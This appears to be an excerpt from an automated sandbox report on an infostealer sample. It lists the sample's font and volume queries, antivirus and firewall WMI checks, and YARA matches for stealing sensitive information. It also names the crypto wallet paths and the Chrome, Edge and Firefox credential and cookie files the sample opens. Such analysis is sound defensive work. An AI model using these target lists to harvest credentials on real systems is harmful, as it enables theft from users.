                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Code function: 0_2_00EADF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00EADF1E
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Code function: 0_2_00E9B146 GetVersionExW,0_2_00E9B146
                                    Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara match File source: 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000004.00000002.1756943981.0000000012994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: Process Memory Space: ChainFontruntimeCrt.exe PID: 7412, type: MEMORYSTR
                                    Source: Yara match File source: Process Memory Space: yeeQesPXxpnDuwPWqTnUoVbi.exe PID: 7664, type: MEMORYSTR
                                    Source: Yara match File source: 8k1e14tjcx.exe, type: SAMPLE
                                    Source: Yara match File source: 0.3.8k1e14tjcx.exe.58c6709.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 4.0.ChainFontruntimeCrt.exe.210000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 0.3.8k1e14tjcx.exe.6f7e709.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 0.3.8k1e14tjcx.exe.6f7e709.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 00000004.00000000.1706629169.0000000000212000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000000.00000003.1697920956.0000000005878000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: 00000000.00000003.1696822133.0000000006F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match File source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, type: DROPPED
                                    Source: Yara match File source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara match File source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, type: DROPPED
Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: Electrum
Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: \Electrum\wallets\
Source: ChainFontruntimeCrt.exe, 00000004.00000002.1754509420.0000000002888000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty
Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: \Exodus\exodus.wallet\
Source: ChainFontruntimeCrt.exe, 00000004.00000002.1754509420.0000000002888000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: 8k1e14tjcx.exe, 00000000.00000003.1696822133.0000000006F30000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: set_UseMachineKeyStore
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
